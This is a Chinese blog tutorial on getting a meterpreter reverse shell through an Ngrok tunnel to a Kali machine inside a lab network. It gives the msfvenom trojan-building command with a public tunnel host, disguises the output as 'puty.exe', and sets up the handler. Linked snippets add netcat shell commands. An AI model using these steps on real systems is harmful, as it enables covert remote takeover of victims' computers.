内网kali 通过ngrok穿透反弹shell

已于 2023-09-12 14:52:00 修改
阅读量7.7k 收藏 61
点赞数 9
分类专栏: kali linux 文章标签: ngrok kali内网穿透
于 2019-08-05 21:28:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/98522075
版权

1、在ngrok注册账号,并且开通免费隧道(点击下载)

   这里我kali的内网ip地址是10.10.10.131

2、.下载Ngrok客户端 (地址https://www.ngrok.cc/download.html)

解压后上传至kali 或者传到kali后unzip 命令进行解压 得到一个sunny文件

3、启动sunny

  ./sunny  clientid 隧道id

如上图说明启动成功

4、目标机 ip地址192.168.43.170(win2003)  kali 10.10.10.131(这里是我通过虚拟机配置的内外网环境)

即目标机无法ping通kali   kali可以ping通目标机  即kali处于内网 验证如下图

5、kali端配置木马

   Msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10326 -f exe -o /root/Desktop/puty.exe   (生成木马)

LHOST 为赠送的域名

LPORT 为远程端口号

6、启动msf配置Exploit模块

   Use exploit/multi/handler

7、选择攻击载荷

   Set payload windows/meterpreter/reverse_tcp

 

执行run 或许exploit

注意这里的ip地址和端口号,不要和前面的搞混了

上传之前生成的木马并且执行

已经成功将shell反弹到我们的内网kali

第二种内网穿透方式,也是我平时用的比较多的一种见连接

https://blog.csdn.net/u010025272/article/details/127101003

 

丢了少年失了心1
关注
  • 9
    点赞
  • 61
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 12
    评论
专栏目录
[Kali Linux]入门:内网穿透的教程和实战(很适合入门|附图)
MSB_WLAQ的博客
10-07 5148
hello 各位freebuf的铁铁,我是白面安全猿,我又来发表文章了。因为最近有好多网友问我关于内网穿透的事情,所以打算写一篇教程尽量教会各位刚入门kali的新手和没有具体了解过内网穿透的老手内网穿透! 我这个人也不喜欢搞什么花里胡少的东西,原理我就不多说了,说了新手理解起来比较吃力,都是从那一步来的都知道。如果想要具体去了解内网穿透原理的话可以去看看其他博主的文章。 首先想要内网穿透的话必须先要用到内网穿透的工具,很多第三方都提供了内网穿透的工具,比如花生壳啊或者飞鸽啊等等,那么我这里推荐一下sun
内网渗透之反弹shell
weixin_41038905的博客
01-31 874
蚕吐丝,蜂酿蜜,人不学,不如物! 场景1 步骤一:将被控服务器shell反弹到本地的4444端口,并监听4444端口(受害机输入) nc -lvp 4444 -e cmd.exe (反弹windows shell) nc -lvp 4444 -e /bin/bash (反弹linux shell) 步骤二:攻击机连接被控服务器的4444端口(攻击机输入) nc -nv 受害机ip 4444 场景2 2利用nc反弹shell 条件:防火墙开启,不允许访问目标端口(可直接关闭目标机防火墙,权限
kali 安装cpolar内网穿透实现 ssh 远程连接
小吉妙妙屋
09-05 2323
简单几步通过cpolar 内网穿透软件实现ssh 远程连接kali!
内网安全:Socks 代理 || 本地代理 技术.
网络安全领域___专研者.
06-12 5993
Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.
Kali初讲——非局域网下入侵手机
最新发布
萌蠢骇客
06-04 1495
kali linux使用反弹shell入侵手机全流程——使用本教程请遵循网络安全法。
kali GPS定位seeker ngrok
qq_44637753的博客
04-12 7370
ngrok下载地址:https://ngrok.com/download seeker下载地址:https://github.com/thewhiteh4t/seeker 地址压缩:https://sina.lt/ seeker安装 git clone https://github.com/thewhiteh4t/seeker.git cd seeker/ chmod +x install.sh ./install.sh python3 seeker.py -h usage: seeker.py [-h]
木马渗透外网机器,kali+frp 供学习交流
m0_73661152的博客
07-17 2021
前言:在kali的学习中木马起到了重要性的作用,木马不需要利用任何漏洞就可以实现对目标机器的渗透,所以木马是一支利箭,而没有弓弩单凭手抛却不能发挥它的最大作用。关于木马加密方案,博主并没有深入研究,Android木马先阶段属于裸奔,windows木马可以通过Themida程序加密效果不错可以过火绒,百度可以寻找教程,不过多赘述。由于CentOS和kali的内核都是Linux 所以kali的frp安装步骤与服务器相同(但是客户端编辑的是frps.ini文件,不要于服务器端的frpc.ini混淆)
详解NC反弹shell的几种方法
01-08
最终是将ubuntu、CentOS的shell反弹kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell...
浅析Linux之bash反弹shell原理
01-08
攻击机 kali 成功反弹shell 原理 反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起...
更新kali系统的脚本
04-11
更新kali系统的脚本更新kali系统的脚本更新kali系统的脚本更新kali系统的脚本更新kali系统的脚本更新kali系统的脚本更新kali系统的脚本更新kali系统的脚本
kali 1800W超强字典
04-07
kali 1800W超强字典
【报错】kali安装ngrok报错解决办法(zsh: exec format error: ./ngrok
九芒星的博客
10-29 791
kali安装ngrok令牌授权失败在安装配置文件的时候报错:zsh: exec format error: ./ngrok
kali渗透内网和外网
weixin_62693307的博客
04-17 6077
set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用。这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网。
Kali使用Metasploit内、外网渗透windows系统
热门推荐
QQ670663的博客
02-17 2万+
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。 一、(内网渗透)内网英文缩写WAN;内网又称局域网 局域网的覆盖范围一般是方圆几千米之内,其具备的安装便捷、成本节约、扩展方便等特点使其在各类办公室内运用广泛。局域网可以实现文件管理、应用软件共享、打印机共享等功能,在使用过程当中,通过维护局域网网...
kali安装内网穿透工具并实现ssh远程连接
小小小智_x0__0x_的博客
11-27 4526
简单几步通过[cpolar 内网穿透]()软件实现ssh远程连接kali
关于内网穿透真实案例讲解
qq_36585338的博客
02-13 845
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 Kali 0x006内网穿透—数据转发 ​ GitHub - shellfeel/Ant-AntV: 一个经过实战考验的免杀程序生成器 MSF监听会话
Ubuntu下如何解压缩zip,tar,tar.gz,tar.bz2文件
mjiansun的专栏
09-15 607
tar 解包:tar xvf FileName.tar 打包:tar cvf FileName.tar DirName (注:tar是打包,不是压缩!) ———————————————.gz 解压1:gunzip FileName.gz 解压2:gzip -d FileName.gz 压缩:gzip FileName.tar.gz 解压:tar zxvf FileName.tar.gz 压缩:tar zcvf FileName.tar.gz DirName ———————————————.bz2 解压1:b
内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok
m0_65336233的博客
12-23 2306
内网安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok
kali的常用命令
jdk12123的博客
06-14 4290
passwd 修改密码passwd root 修改root用户密码date 显示系统日期sudo 后面加命令 就可以调用管理权限apt-get update 更新软件列表这个命令,会访问源列表里的每个网址,并读取软件列表,然后保存在本地电脑。我们在新立得软件包管理器里看到的软件列表,都是通过update命令更新的。apt-get upgrade 更新软件这个命令,会把本地已安装的软件,与刚下载的软件列表里对应软件进行对比,如果发现已安装的软件版本太低,就会提示你更新。
kali frp内网穿透
07-28
Kali Linux是一款功能强大的渗透测试和安全审计操作系统。而FRP是一款免费的内网穿透工具,可以帮助你在外网访问内网的服务。在Kali Linux上使用FRP进行内网穿透,可以按照以下步骤进行操作: 1. 下载FRP:首先,你需要从FRP的官方网站(https://github.com/fatedier/frp)上下载适用于Kali Linux的FRP客户端。 2. 配置FRP:解压下载的FRP压缩包,并进入解压后的文件夹。在该文件夹中,你会找到一个frpc.ini文件,这是FRP的配置文件。 3. 编辑配置文件:使用文本编辑器打开frpc.ini文件,并根据需要进行配置。你需要设置服务器地址(即远程服务器的IP地址)、服务器端口以及要内网穿透的服务端口。 4. 运行FRP客户端:在Kali Linux终端中,进入FRP客户端所在的目录,并运行以下命令启动FRP客户端: ``` ./frpc -c frpc.ini ``` 5. 配置远程服务器:在你的远程服务器上,你需要安装并配置FRP服务器端。具体的配置步骤可以参考FRP官方文档。 6. 测试穿透效果:完成上述步骤后,你可以在外网环境下访问你内网中的服务了。使用外网IP地址和配置的服务端口,尝试访问内网服务,看看是否成功穿透。 请注意,使用FRP进行内网穿透可能会涉及网络安全风险,请确保你的网络环境和操作是安全的,并根据实际需求进行配置和使用

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值